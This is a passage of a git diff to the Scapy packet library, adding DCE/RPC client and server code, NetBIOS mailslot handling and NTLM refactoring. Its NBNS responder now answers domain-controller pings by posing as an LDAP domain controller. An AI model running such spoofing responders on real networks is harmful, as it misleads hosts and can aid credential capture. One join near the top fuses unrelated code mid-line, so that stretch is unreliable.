pkt.ValueCount + "BooleanValues", [], NDRLongField, size_is=lambda pkt: pkt.ValueCount ), deferred=True, ), @@ -487,41 +535,41 @@ class CLAIM_ENTRY(NDRPacket): NDRUnionField( [ ( - NDRPacketField("Values", u_sub0(), u_sub0), + NDRPacketField("Values", CLAIM_ENTRY_sub0(), CLAIM_ENTRY_sub0), ( ( - lambda pkt: getattr(pkt, "Type", None) == - CLAIM_TYPE.CLAIM_TYPE_INT64 + lambda pkt: getattr(pkt, "Type", None) + == CLAIM_TYPE.CLAIM_TYPE_INT64 ), (lambda _, val: val.tag == CLAIM_TYPE.CLAIM_TYPE_INT64), ), ), ( - NDRPacketField("Values", u_sub1(), u_sub1), + NDRPacketField("Values", CLAIM_ENTRY_sub1(), CLAIM_ENTRY_sub1), ( ( - lambda pkt: getattr(pkt, "Type", None) == - CLAIM_TYPE.CLAIM_TYPE_UINT64 + lambda pkt: getattr(pkt, "Type", None) + == CLAIM_TYPE.CLAIM_TYPE_UINT64 ), (lambda _, val: val.tag == CLAIM_TYPE.CLAIM_TYPE_UINT64), ), ), ( - NDRPacketField("Values", u_sub2(), u_sub2), + NDRPacketField("Values", CLAIM_ENTRY_sub2(), CLAIM_ENTRY_sub2), ( ( - lambda pkt: getattr(pkt, "Type", None) == - CLAIM_TYPE.CLAIM_TYPE_STRING + lambda pkt: getattr(pkt, "Type", None) + == CLAIM_TYPE.CLAIM_TYPE_STRING ), (lambda _, val: val.tag == CLAIM_TYPE.CLAIM_TYPE_STRING), ), ), ( - NDRPacketField("Values", u_sub3(), u_sub3), + NDRPacketField("Values", CLAIM_ENTRY_sub3(), CLAIM_ENTRY_sub3), ( ( - lambda pkt: getattr(pkt, "Type", None) == - CLAIM_TYPE.CLAIM_TYPE_BOOLEAN + lambda pkt: getattr(pkt, "Type", None) + == CLAIM_TYPE.CLAIM_TYPE_BOOLEAN ), (lambda _, val: val.tag == CLAIM_TYPE.CLAIM_TYPE_BOOLEAN), ), @@ -529,7 +577,7 @@ class CLAIM_ENTRY(NDRPacket): ], StrFixedLenField("Values", "", length=0), align=(2, 8), - switch_fmt=("> REQUEST: %s" % pkt.__class__.__name__)) + # Send/receive + resp = self.sr1(DceRpc5Request(cont_id=self.cont_id) / pkt, **kwargs) + if DceRpc5Response in resp: + if self.verb: + print( + conf.color_theme.success( + "<< RESPONSE: %s" + % (resp[DceRpc5Response].payload.__class__.__name__) + ) + ) + return resp[DceRpc5Response].payload + else: + if self.verb: + if DceRpc5Fault in resp: + if ( + resp[DceRpc5Fault].payload and + not isinstance(resp[DceRpc5Fault].payload, conf.raw_layer) + ): + resp[DceRpc5Fault].payload.show() + if resp.status == 0x00000005: + print(conf.color_theme.fail("! nca_s_fault_access_denied")) + elif resp.status == 0x00000721: + print( + conf.color_theme.fail( + "! nca_s_fault_sec_pkg_error " + "(error in checksum/encryption)" + ) + ) + else: + print(conf.color_theme.fail("! Failure")) + resp.show() + return + return resp + + def get_bind_context(self, interface): + return [ + DceRpc5Context( + cont_id=0, + abstract_syntax=DceRpc5AbstractSyntax( + if_uuid=interface.uuid, + if_version=interface.if_version, + ), + transfer_syntaxes=[ + DceRpc5TransferSyntax( + # NDR 2.0 32-bit + if_uuid="NDR 2.0", + if_version=2, + ) + ], + ), + ] + ( + [ + DceRpc5Context( + cont_id=1, + abstract_syntax=DceRpc5AbstractSyntax( + if_uuid=interface.uuid, + if_version=interface.if_version, + ), + transfer_syntaxes=[ + DceRpc5TransferSyntax( + # NDR64 + if_uuid="NDR64", + if_version=1, + ) + ], + ), + DceRpc5Context( + cont_id=2, + abstract_syntax=DceRpc5AbstractSyntax( + if_uuid=interface.uuid, + if_version=interface.if_version, + ), + transfer_syntaxes=[ + DceRpc5TransferSyntax( + if_uuid=uuid.UUID("6cb71c2c-9812-4540-0300-000000000000"), + if_version=1, + ) + ], + ), + ] + if self.ndr64 + else [] + ) + + def _bind(self, interface, reqcls, respcls): + # Build a security context: [MS-RPCE] 3.3.1.5.2 + if self.verb: + print( + conf.color_theme.opening( + ">> %s on %s" % (reqcls.__name__, interface) + + (" (with %s)" % self.ssp.__class__.__name__ if self.ssp else "") + ) + ) + if self.ssp and self.transport == DCERPC_Transport.NCACN_IP_TCP: + # NCACN_NP = SMB does not bind the RPC securely, as it has already + # authenticated during the SMB Session Setup + self.sspcontext, token, negResult = self.ssp.GSS_Init_sec_context( + self.sspcontext + ) + if negResult not in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: + print(conf.color_theme.fail( + "SSP failed on initial GSS_Init_sec_context !" + )) + if token: + token.show() + return False + pkt = self.sr1( + reqcls(context_elem=self.get_bind_context(interface)), + auth_verifier=None + if not self.sspcontext + else CommonAuthVerifier( + auth_type=self.ssp.auth_type, + auth_level=self.ssp.auth_level, + auth_value=token, + ), + ) + # Check context acceptance + if respcls in pkt and any( + x.result == 0 for x in pkt.results[: int(self.ndr64) + 1] + ): + self.call_id = 0 # reset call id + if self.sspcontext: + if self.ssp.LegsAmount(self.sspcontext) >= 3: + # AUTH 3 for certain SSPs (e.g. NTLM) + # "The server MUST NOT respond to an rpc_auth_3 PDU" + self.sspcontext, token, negResult = self.ssp.GSS_Init_sec_context( + self.sspcontext, + val=pkt.auth_verifier.auth_value, + ) + if negResult not in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: + print(conf.color_theme.fail( + "SSP failed on subsequent GSS_Init_sec_context !" + )) + if token: + token.show() + return False + self.send( + DceRpc5Auth3(), + auth_verifier=None + if not self.ssp + else CommonAuthVerifier( + auth_type=self.ssp.auth_type, + auth_level=self.ssp.auth_level, + auth_value=token, + ), + ) + if self.verb: + print( + conf.color_theme.opening( + ">> DceRpc5Auth3 on %s" % interface + ) + ) + ndr = self.sock.session.ndr64 and "NDR64" or "NDR32" + self.cont_id = int(self.sock.session.ndr64) # ctx 0 for NDR32, 1 for NDR64 + port = pkt.sec_addr.port_spec.decode() + if self.verb: + print( + conf.color_theme.success( + f"<< {respcls.__name__} port '{port}' using {ndr}" + ) + ) + self.sock.session.sspcontext = self.sspcontext + return True + else: + if self.verb: + if DceRpc5BindNak in pkt: + err_msg = {0: "Reason not specified"}.get( + pkt.provider_reject_reason, + "provider_reject_reason %s" % hex(pkt.provider_reject_reason), + ) + print(conf.color_theme.fail("! Bind_nak (%s)" % err_msg)) + elif DceRpc5Fault in pkt: + if pkt.status == 0x00000005: + print(conf.color_theme.fail("! nca_s_fault_access_denied")) + elif pkt.status == 0x00000721: + print( + conf.color_theme.fail( + "! nca_s_fault_sec_pkg_error " + "(error in checksum/encryption)" + ) + ) + else: + print(conf.color_theme.fail("! Failure")) + pkt.show() + else: + print(conf.color_theme.fail("! Failure")) + pkt.show() + return False + + def bind(self, interface): + """ + Bind the client to an interface + """ + return self._bind(interface, DceRpc5Bind, DceRpc5BindAck) + + def alter_context(self, interface): + """ + Alter context: post-bind context negotiation + """ + return self._bind(interface, DceRpc5AlterContext, DceRpc5AlterContextResp) + + def open_smbpipe(self, name): + """ + Open a certain filehandle with the SMB automaton + """ + self.ipc_tid = self.smbrpcsock.tree_connect("IPC$") + self.smbrpcsock.open_pipe(name) + + def close_smbpipe(self): + """ + Close the previously opened pipe + """ + self.smbrpcsock.set_TID(self.ipc_tid) + self.smbrpcsock.close_pipe() + self.smbrpcsock.tree_disconnect() + + def connect_and_bind( + self, + ip, + interface, + port=None, + smb_kwargs={}, + ): + """ + Asks the Endpoint Mapper what address to use to connect to the interface, + then uses connect() followed by a bind() + """ + if self.transport == DCERPC_Transport.NCACN_IP_TCP: + # IP/TCP + # 1. ask the endpoint mapper (port 135) for the IP:PORT + endpoints = get_endpoint( + ip, + interface, + ndrendian=self.ndrendian, + verb=self.verb, + ) + if endpoints: + ip, port = endpoints[0] + else: + return + # 2. Connect to that IP:PORT + self.connect(ip, port=port) + elif self.transport == DCERPC_Transport.NCACN_NP: + # SMB + # 1. ask the endpoint mapper (over SMB) for the namedpipe + endpoints = get_endpoint( + ip, + interface, + transport=self.transport, + ndrendian=self.ndrendian, + verb=self.verb, + smb_kwargs=smb_kwargs, + ) + if endpoints: + pipename = endpoints[0].lstrip("\\pipe\\") + else: + return + # 2. connect to the SMB server + self.connect(ip, port=port, smb_kwargs=smb_kwargs) + # 3. open the new named pipe + self.open_smbpipe(pipename) + # Bind in RPC + self.bind(interface) + + def epm_map(self, interface): + """ + Calls ept_map (the EndPoint Manager) + """ + if self.ndr64: + ndr_uuid = "NDR64" + ndr_version = 1 + else: + ndr_uuid = "NDR 2.0" + ndr_version = 2 + pkt = self.sr1_req( + ept_map_Request( + obj=NDRPointer( + referent_id=1, + value=UUID( + Data1=0, + Data2=0, + Data3=0, + Data4=None, + ), + ), + map_tower=NDRPointer( + referent_id=2, + value=twr_p_t( + tower_octet_string=bytes( + protocol_tower_t( + floors=[ + prot_and_addr_t( + lhs_length=19, + protocol_identifier=0xD, + uuid=interface.uuid, + version=interface.major_version, + rhs_length=2, + rhs=interface.minor_version, + ), + prot_and_addr_t( + lhs_length=19, + protocol_identifier=0xD, + uuid=ndr_uuid, + version=ndr_version, + rhs_length=2, + rhs=0, + ), + prot_and_addr_t( + lhs_length=1, + protocol_identifier="RPC connection-oriented protocol", # noqa: E501 + rhs_length=2, + rhs=0, + ), + { + DCERPC_Transport.NCACN_IP_TCP: ( + prot_and_addr_t( + lhs_length=1, + protocol_identifier="NCACN_IP_TCP", + rhs_length=2, + rhs=135, + ) + ), + DCERPC_Transport.NCACN_NP: ( + prot_and_addr_t( + lhs_length=1, + protocol_identifier="NCACN_NP", + rhs_length=2, + rhs=b"0\x00", + ) + ), + }[self.transport], + { + DCERPC_Transport.NCACN_IP_TCP: ( + prot_and_addr_t( + lhs_length=1, + protocol_identifier="IP", + rhs_length=4, + rhs="0.0.0.0", + ) + ), + DCERPC_Transport.NCACN_NP: ( + prot_and_addr_t( + lhs_length=1, + protocol_identifier="NCACN_NB", + rhs_length=10, + rhs=b"127.0.0.1\x00", + ) + ), + }[self.transport], + ], + ) + ), + ), + ), + entry_handle=NDRContextHandle( + attributes=0, + uuid=b"\x00" * 16, + ), + max_towers=500, + ndr64=self.ndr64, + ndrendian=self.ndrendian, + ) + ) + if pkt and ept_map_Response in pkt: + status = pkt[ept_map_Response].status + # [MS-RPCE] sect 2.2.1.2.5 + if status == 0x00000000: + towers = [ + protocol_tower_t(x.value.tower_octet_string) + for x in pkt[ept_map_Response].ITowers.value[0].value + ] + # Let's do some checks to know we know what we're doing + endpoints = [] + for t in towers: + if t.floors[0].uuid != interface.uuid: + if self.verb: + print( + conf.color_theme.fail( + "! Server answered with a different interface." + ) + ) + raise ValueError + if t.floors[1].sprintf("%uuid%") != ndr_uuid: + if self.verb: + print( + conf.color_theme.fail( + "! Server answered with a different NDR version." + ) + ) + raise ValueError + if self.transport == DCERPC_Transport.NCACN_IP_TCP: + endpoints.append((t.floors[4].rhs, t.floors[3].rhs)) + elif self.transport == DCERPC_Transport.NCACN_NP: + endpoints.append(t.floors[3].rhs.rstrip(b"\x00").decode()) + return endpoints + elif status == 0x16C9A0D6: + if self.verb: + pkt.show() + print( + conf.color_theme.fail( + "! Server errored: 'There are no elements that satisfy" + " the specified search criteria'." + ) + ) + raise ValueError + print(conf.color_theme.fail("! Failure.")) + if pkt: + pkt.show() + raise ValueError("EPM Map failed") + + +def get_endpoint( + ip, + interface, + transport=DCERPC_Transport.NCACN_IP_TCP, + ndrendian="little", + verb=True, + smb_kwargs={}, +): + """ + Call the endpoint mapper on a remote IP to find an interface + + :param ip: + :param interface: + :param mode: + :param verb: + + :return: a list of connection tuples for this interface + """ + client = DCERPC_Client( + transport, + ndr64=False, + ndrendian=ndrendian, + verb=verb, + ) # EPM only works with NDR32 + client.connect(ip, smb_kwargs=smb_kwargs) + if transport == DCERPC_Transport.NCACN_NP: # SMB + client.open_smbpipe("epmapper") + client.bind(find_dcerpc_interface("ept")) + endpoints = client.epm_map(interface) + client.close() + return endpoints diff --git a/scapy/layers/msrpce/rpcserver.py b/scapy/layers/msrpce/rpcserver.py new file mode 100644 index 00000000000..ff1d9f64393 --- /dev/null +++ b/scapy/layers/msrpce/rpcserver.py @@ -0,0 +1,436 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +DCE/RPC server as per [MS-RPCE] +""" + +import socket +import threading +from collections import deque + +from scapy.arch import get_if_addr +from scapy.config import conf +from scapy.data import MTU +from scapy.volatile import RandShort + +from scapy.layers.dcerpc import ( + DceRpc5, + DceRpcSession, + DceRpc5Bind, + DceRpc5BindAck, + DceRpc5BindNak, + DceRpc5Auth3, + DceRpc5AlterContext, + DceRpc5AlterContextResp, + DceRpc5Result, + DceRpc5Request, + DceRpc5Response, + DceRpc5TransferSyntax, + DceRpc5PortAny, + CommonAuthVerifier, + DCE_RPC_INTERFACES, + DCERPC_Transport, +) + +# RPC +from scapy.layers.msrpce.ept import ( + ept_map_Request, + ept_map_Response, + twr_p_t, + protocol_tower_t, + prot_and_addr_t, +) + + +class _DCERPC_Server_metaclass(type): + def __new__(cls, name, bases, dct): + dct.setdefault( + "dcerpc_commands", + {x.dcerpc_command: x for x in dct.values() if hasattr(x, "dcerpc_command")}, + ) + return type.__new__(cls, name, bases, dct) + + +class DCERPC_Server(metaclass=_DCERPC_Server_metaclass): + def __init__( + self, + transport, + ndr64=False, + verb=True, + local_ip=None, + port=None, + portmap=None, + **kwargs, + ): + self.transport = transport + self.session = DceRpcSession(**kwargs) + self.queue = deque() + self.ndr64 = ndr64 + if ndr64: + self.ndr_name = "NDR64" + else: + self.ndr_name = "NDR 2.0" + # For endpoint mapper. TODO: improve separation/handling of SMB/IP etc + self.local_ip = local_ip + self.port = port + self.portmap = portmap or {} + self.verb = verb + + def loop(self, sock): + while True: + pkt = sock.recv(MTU) + if not pkt: + break + self.recv(pkt) + # send all possible responses + while True: + resp = self.get_response() + if not resp: + break + sock.send(bytes(resp)) + + @staticmethod + def answer(reqcls): + """ + A decorator that registers a DCE/RPC responder to a command. + See the DCE/RPC documentation. + + :param reqcls: the DCE/RPC packet class to respond to + """ + + def deco(func): + func.dcerpc_command = reqcls + return func + + return deco + + def extend(self, server_cls): + """ + Extend a DCE/RPC server into another + """ + self.dcerpc_commands.update(server_cls.dcerpc_commands) + + def make_reply(self, req): + cls = req[DceRpc5Request].payload.__class__ + if cls in self.dcerpc_commands: + # call handler + return self.dcerpc_commands[cls](self, req) + return None + + @classmethod + def spawn(cls, transport, iface=None, port=135, bg=False, **kwargs): + """ + Spawn a DCE/RPC server + + :param transport: one of DCERPC_Transport + :param iface: the interface to spawn it on (default: conf.iface) + :param port: the port to spawn it on (for IP_TCP or the SMB server) + :param bg: background mode? (default: False) + """ + if transport == DCERPC_Transport.NCACN_IP_TCP: + # IP/TCP case + ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + local_ip = get_if_addr(iface or conf.iface) + try: + ssock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + except OSError: + pass + ssock.bind((local_ip, port)) + ssock.listen(5) + sockets = [] + if kwargs.get("verb", True): + print( + conf.color_theme.green( + "Server %s started. Waiting..." % cls.__name__ + ) + ) + + def _run(): + # Wait for clients forever + try: + while True: + clientsocket, address = ssock.accept() + sockets.append(clientsocket) + print( + conf.color_theme.gold( + "\u2503 Connection received from %s" % repr(address) + ) + ) + server = cls( + DCERPC_Transport.NCACN_IP_TCP, + local_ip=local_ip, + port=port, + **kwargs, + ) + threading.Thread( + target=server.loop, args=(clientsocket,) + ).start() + except KeyboardInterrupt: + print("X Exiting.") + ssock.shutdown(socket.SHUT_RDWR) + except OSError: + print("X Server closed.") + finally: + for sock in sockets: + try: + sock.shutdown(socket.SHUT_RDWR) + sock.close() + except Exception: + pass + ssock.close() + + if bg: + # Background + threading.Thread(target=_run).start() + return ssock + else: + # Non-background + _run() + elif transport == DCERPC_Transport.NCACN_NP: + # SMB case + from scapy.layers.smbserver import SMB_Server + + kwargs.setdefault("shares", []) # do not expose files by default + return SMB_Server.spawn( + iface=iface or conf.iface, + port=port, + bg=bg, + # Important: pass the DCE/RPC server + DCERPC_SERVER_CLS=cls, + # SMB parameters + **kwargs, + ) + else: + raise ValueError("Unsupported transport :(") + + def recv(self, data): + if isinstance(data, bytes): + req = DceRpc5(data) + else: + req = data + # If the packet has padding, it contains several fragments + pad = None + if conf.padding_layer in req: + pad = req[conf.padding_layer].load + req[conf.padding_layer].underlayer.remove_payload() + # Ask the DCE/RPC session to process it (match interface, etc.) + req = self.session.in_pkt(req) + hdr = DceRpc5( + endian=req.endian, + encoding=req.encoding, + float=req.float, + call_id=req.call_id, + ) + # Now process the packet based on the DCE/RPC type + if DceRpc5Bind in req or DceRpc5AlterContext in req or DceRpc5Auth3 in req: + # Log + if self.verb: + print( + conf.color_theme.opening( + "<< %s" % req.payload.__class__.__name__ + + ( + " (with %s)" % self.session.ssp.__class__.__name__ + if self.session.ssp + else "" + ) + ) + ) + if not self.session.rpc_bind_interface: + # The session did not find a matching interface ! + self.queue.extend(self.session.out_pkt(hdr / DceRpc5BindNak())) + if self.verb: + print(conf.color_theme.fail("! DceRpc5BindNak (unknown interface)")) + else: + auth_value, status = None, 0 + if ( + self.session.ssp + and req.auth_verifier + and req.auth_verifier.auth_value + ): + ( + self.session.sspcontext, + auth_value, + status, + ) = self.session.ssp.GSS_Accept_sec_context( + self.session.sspcontext, req.auth_verifier.auth_value + ) + try: + self.session.ssp.auth_level = req.auth_verifier.auth_level + except AttributeError: + # it is possible for the SSP to get unset, if there is a + # re-negotiation + pass + if DceRpc5Auth3 in req: + # Auth 3 stops here (no server response) ! + if status != 0: + print(conf.color_theme.fail("! DceRpc5Auth3 failed")) + if pad is not None: + self.recv(pad) + return + # auth_verifier here contains the SSP nego packets + # (whereas it usually contains the verifiers) + hdr.auth_verifier = CommonAuthVerifier( + auth_type=req.auth_verifier.auth_type, + auth_level=req.auth_verifier.auth_level, + auth_value=auth_value, + ) + + def get_result(ctx): + name = ctx.transfer_syntaxes[0].sprintf("%if_uuid%") + if name == self.ndr_name: + # Acceptance + return DceRpc5Result( + result=0, + reason=0, + transfer_syntax=DceRpc5TransferSyntax( + if_uuid=ctx.transfer_syntaxes[0].if_uuid, + if_version=ctx.transfer_syntaxes[0].if_version, + ), + ) + elif name == "Bind Time Feature Negotiation": + return DceRpc5Result( + result=3, + reason=3, + transfer_syntax=DceRpc5TransferSyntax( + if_uuid="NULL", + if_version=0, + ), + ) + else: + # Reject + return DceRpc5Result( + result=2, + reason=2, + transfer_syntax=DceRpc5TransferSyntax( + if_uuid="NULL", + if_version=0, + ), + ) + + results = [get_result(x) for x in req.context_elem] + if self.port is None: + # Piped + port_spec = ( + b"\\\\PIPE\\\\%s\0" + % self.session.rpc_bind_interface.name.encode() + ) + else: + # IP + port_spec = str(self.port).encode() + b"\x00" + if DceRpc5Bind in req: + cls = DceRpc5BindAck + else: + cls = DceRpc5AlterContextResp + self.queue.extend( + self.session.out_pkt( + hdr + / cls( + assoc_group_id=RandShort(), + sec_addr=DceRpc5PortAny( + port_spec=port_spec, + ), + results=results, + ), + ) + ) + if self.verb: + print( + conf.color_theme.success( + f">> {cls.__name__} {self.session.rpc_bind_interface.name}" + f" is on port '{port_spec.decode()}' using {self.ndr_name}" + ) + ) + elif DceRpc5Request in req: + if self.verb: + print( + conf.color_theme.opening( + "<< REQUEST: %s" + % req[DceRpc5Request].payload.__class__.__name__ + ) + ) + # Can be any RPC request ! + resp = self.make_reply(req) + if resp: + self.queue.extend( + self.session.out_pkt( + hdr + / DceRpc5Response( + alloc_hint=len(resp), + cont_id=req.cont_id, + ) + / resp, + ) + ) + if self.verb: + print( + conf.color_theme.success( + ">> RESPONSE: %s" % (resp.__class__.__name__) + ) + ) + # If there was padding, process the second frag + if pad is not None: + self.recv(pad) + + def get_response(self): + try: + return self.queue.popleft() + except IndexError: + return None + + # Endpoint mapper + + @answer.__func__(ept_map_Request) # hack for Python <= 3.9 + def ept_map(self, req): + """ + Answer to ept_map_Request. + """ + if self.transport != DCERPC_Transport.NCACN_IP_TCP: + raise ValueError("Unimplemented") + + tower = protocol_tower_t( + req[ept_map_Request].valueof("map_tower.tower_octet_string") + ) + uuid = tower.floors[0].uuid + if_version = (tower.floors[0].rhs << 16) | tower.floors[0].version + + # Check for results in our portmap + port = None + if (uuid, if_version) in DCE_RPC_INTERFACES: + interface = DCE_RPC_INTERFACES[(uuid, if_version)] + if interface in self.portmap: + port = self.portmap[interface] + + if port is not None: + # Found result + resp_tower = twr_p_t( + tower_octet_string=bytes( + protocol_tower_t( + floors=[ + tower.floors[0], # UUID + tower.floors[1], # NDR version + tower.floors[2], # RPC version + prot_and_addr_t( + lhs_length=1, + protocol_identifier="NCACN_IP_TCP", + rhs_length=2, + rhs=port, + ), + prot_and_addr_t( + lhs_length=1, + protocol_identifier="IP", + rhs_length=4, + rhs=self.local_ip or "0.0.0.0", + ), + ] + ) + ) + ) + resp = ept_map_Response(ITowers=[resp_tower], ndr64=self.ndr64) + resp.ITowers.max_count = req.max_towers # ugh + else: + # No result found + pass + return resp diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 07af77b4365..2728df819ee 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -34,6 +34,7 @@ XShortField, XStrFixedLenField ) +from scapy.volatile import RandUUID from scapy.layers.inet import IP, UDP, TCP from scapy.layers.l2 import SourceMACField @@ -325,6 +326,7 @@ class NBTDatagram(Packet): class NBTSession(Packet): name = "NBT Session Packet" + MAXLENGTH = 0x3ffff fields_desc = [ByteEnumField("TYPE", 0, {0x00: "Session Message", 0x81: "Session Request", 0x82: "Positive Session Response", @@ -336,16 +338,29 @@ class NBTSession(Packet): def post_build(self, pkt, pay): if self.LENGTH is None: - length = len(pay) & (2**18 - 1) + length = len(pay) & self.MAXLENGTH pkt = pkt[:1] + struct.pack("!I", length)[1:] return pkt + pay + def extract_padding(self, s): + return s[:self.LENGTH], s[self.LENGTH:] + + @classmethod + def tcp_reassemble(cls, data, *args, **kwargs): + if len(data) < 4: + return None + length = struct.unpack("!I", data[:4])[0] & cls.MAXLENGTH + if len(data) >= length + 4: + return cls(data) + bind_bottom_up(UDP, NBNSHeader, dport=137) bind_bottom_up(UDP, NBNSHeader, sport=137) bind_top_down(UDP, NBNSHeader, sport=137, dport=137) -bind_layers(UDP, NBTDatagram, dport=138) +bind_bottom_up(UDP, NBTDatagram, dport=138) +bind_bottom_up(UDP, NBTDatagram, sport=138) +bind_top_down(UDP, NBTDatagram, sport=138, dport=138) bind_bottom_up(TCP, NBTSession, dport=445) bind_bottom_up(TCP, NBTSession, sport=445) @@ -356,7 +371,7 @@ def post_build(self, pkt, pay): class NBNS_am(AnsweringMachine): function_name = "nbnsd" - filter = "udp port 137" + filter = "udp port 137 or 138" sniff_options = {"store": 0} def parse_options(self, server_name=None, from_ip=None, ip=None): @@ -377,6 +392,16 @@ def parse_options(self, server_name=None, from_ip=None, ip=None): def is_request(self, req): if self.from_ip and IP in req and req[IP].src not in self.from_ip: return False + if NBTDatagram in req: + # special case: mailslot ping + from scapy.layers.smb import SMBMailslot_Write, NETLOGON_SAM_LOGON_REQUEST + try: + return ( + SMBMailslot_Write in req and + NETLOGON_SAM_LOGON_REQUEST in req.Data + ) + except AttributeError: + return False return NBNSQueryRequest in req and ( not self.ServerName or req[NBNSQueryRequest].QUESTION_NAME.strip() == self.ServerName @@ -384,9 +409,11 @@ def is_request(self, req): def make_reply(self, req): # type: (Packet) -> Packet + if NBTDatagram in req: + # Special case + return self.make_mailslot_ping_reply(req) resp = IP(dst=req[IP].src) / UDP(sport=req.dport, dport=req.sport) - address = self.ip or get_if_addr( - self.optsniff.get("iface", conf.iface)) + address = self.ip or get_if_addr(self.optsniff.get("iface", conf.iface)) resp /= NBNSHeader() / NBNSQueryResponse( RR_NAME=self.ServerName or req.QUESTION_NAME, SUFFIX=req.SUFFIX, @@ -394,3 +421,29 @@ def make_reply(self, req): ) resp.NAME_TRN_ID = req.NAME_TRN_ID return resp + + def make_mailslot_ping_reply(self, req): + # type: (Packet) -> Packet + from scapy.layers.smb import ( + SMBMailslot_Write, + SMB_Header, + NETLOGON_SAM_LOGON_RESPONSE_EX, + ) + resp = IP(dst=req[IP].src) / UDP(sport=req.dport, dport=req.sport) + address = self.ip or get_if_addr(self.optsniff.get("iface", conf.iface)) + resp /= NBTDatagram( + SourceName=req.DestinationName, + SUFFIX1=req.SUFFIX2, + DestinationName=req.SourceName, + SUFFIX2=req.SUFFIX1, + SourceIP=address, + ) / SMB_Header() / SMBMailslot_Write( + Name=req.Data.MailslotName, + ) + resp.Data = NETLOGON_SAM_LOGON_RESPONSE_EX( + OpCode=0x17, + Flags="LDAP+DC", + DomainGuid=RandUUID(), + sin_addr=address, + ) + return resp diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index badfd752340..e50771d5694 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy # See https://scapy.net/ for more information -# Copyright (C) Philippe Biondi +# Copyright (C) Gabriel Potter """ NTLM @@ -9,23 +9,24 @@ https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-NLMP/%5bMS-NLMP%5d.pdf """ -import ssl -import socket +import copy +import time +import os import struct -import threading -from scapy.arch import get_if_addr -from scapy.asn1.asn1 import ASN1_STRING, ASN1_Codecs +from enum import IntEnum + +from scapy.asn1.asn1 import ASN1_Codecs from scapy.asn1.mib import conf # loads conf.mib from scapy.asn1fields import ( ASN1F_OID, ASN1F_PRINTABLE_STRING, ASN1F_SEQUENCE, - ASN1F_SEQUENCE_OF + ASN1F_SEQUENCE_OF, ) from scapy.asn1packet import ASN1_Packet -from scapy.automaton import Automaton, ObjectPipe from scapy.compat import bytes_base64 +from scapy.error import log_runtime from scapy.fields import ( Field, ByteEnumField, @@ -53,28 +54,31 @@ ) from scapy.packet import Packet from scapy.sessions import StringBuffer -from scapy.supersocket import SSLStreamSocket, StreamSocket +from scapy.layers.gssapi import ( + SSP, + _GSSAPI_OIDS, + _GSSAPI_SIGNATURE_OIDS, + GSS_S_CONTINUE_NEEDED, + GSS_S_COMPLETE, + GSS_S_DEFECTIVE_CREDENTIAL, +) from scapy.layers.tls.crypto.hash import Hash_MD5 # Typing imports from typing import ( Any, Callable, - Dict, List, Tuple, + Union, Optional, ) # Crypto imports from scapy.layers.tls.crypto.hash import Hash_MD4 - -if conf.crypto_valid: - from cryptography.hazmat.primitives import hashes, hmac -else: - hashes = hmac = None +from scapy.layers.tls.crypto.h_mac import Hmac_MD5 ########## # Fields # @@ -84,24 +88,40 @@ class _NTLMPayloadField(_StrField[List[Tuple[str, Any]]]): """Special field used to dissect NTLM payloads. This isn't trivial because the offsets are variable.""" - __slots__ = ["fields", "fields_map", "offset", "length_from"] + + __slots__ = [ + "fields", + "fields_map", + "offset", + "length_from", + "force_order", + "offset_name", + ] islist = True - def __init__(self, - name, # type: str - offset, # type: int - fields, # type: List[Field[Any, Any]] - length_from=None # type: Optional[Callable[[Packet], int]] - ): + def __init__( + self, + name, # type: str + offset, # type: Union[int, Callable[[Packet], int]] + fields, # type: List[Field[Any, Any]] + length_from=None, # type: Optional[Callable[[Packet], int]] + force_order=None, # type: Optional[List[str]] + offset_name="BufferOffset", # type: str + ): # type: (...) -> None self.offset = offset self.fields = fields self.fields_map = {field.name: field for field in fields} self.length_from = length_from + self.force_order = force_order # whether the order of fields is fixed + self.offset_name = offset_name super(_NTLMPayloadField, self).__init__( name, - [(field.name, field.default) for field in fields - if field.default is not None] + [ + (field.name, field.default) + for field in fields + if field.default is not None + ], ) def _on_payload(self, pkt, x, func): @@ -112,13 +132,11 @@ def _on_payload(self, pkt, x, func): for field_name, value in x: if field_name not in self.fields_map: continue - if not isinstance(self.fields_map[field_name], PacketListField) \ - and not isinstance(value, Packet): + if not isinstance( + self.fields_map[field_name], PacketListField + ) and not isinstance(value, Packet): value = getattr(self.fields_map[field_name], func)(pkt, value) - results.append(( - field_name, - value - )) + results.append((field_name, value)) return results def i2h(self, pkt, x): @@ -133,20 +151,38 @@ def i2repr(self, pkt, x): # type: (Optional[Packet], bytes) -> str return repr(self._on_payload(pkt, x, "i2repr")) + def _o_pkt(self, pkt): + # type: (Optional[Packet]) -> int + if callable(self.offset): + return self.offset(pkt) + return self.offset + def addfield(self, pkt, s, val): # type: (Optional[Packet], bytes, Optional[List[Tuple[str, str]]]) -> bytes + # Create string buffer buf = StringBuffer() + buf.append(s, 1) + # Calc relative offset + r_off = self._o_pkt(pkt) - len(s) + if self.force_order: + val.sort(key=lambda x: self.force_order.index(x[0])) for field_name, value in val: if field_name not in self.fields_map: continue field = self.fields_map[field_name] - offset = pkt.getfieldval(field_name + "BufferOffset") - if offset is not None: - offset -= self.offset - else: + offset = pkt.getfieldval(field_name + self.offset_name) + if offset is None: + # No offset specified: calc offset = len(buf) - buf.append(field.addfield(pkt, b"", value), offset + 1) - return s + bytes(buf) + else: + # Calc relative offset + offset -= r_off + pad = offset + 1 - len(buf) + # Add padding if necessary + if pad > 0: + buf.append(pad * b"\x00", len(buf)) + buf.append(field.addfield(pkt, bytes(buf), value)[len(buf) :], offset + 1) + return bytes(buf) def getfield(self, pkt, s): # type: (Packet, bytes) -> Tuple[bytes, List[Tuple[str, str]]] @@ -159,20 +195,33 @@ def getfield(self, pkt, s): return s, [] results = [] max_offset = 0 - for field in self.fields: - offset = pkt.getfieldval(field.name + "BufferOffset") - self.offset + o_pkt = 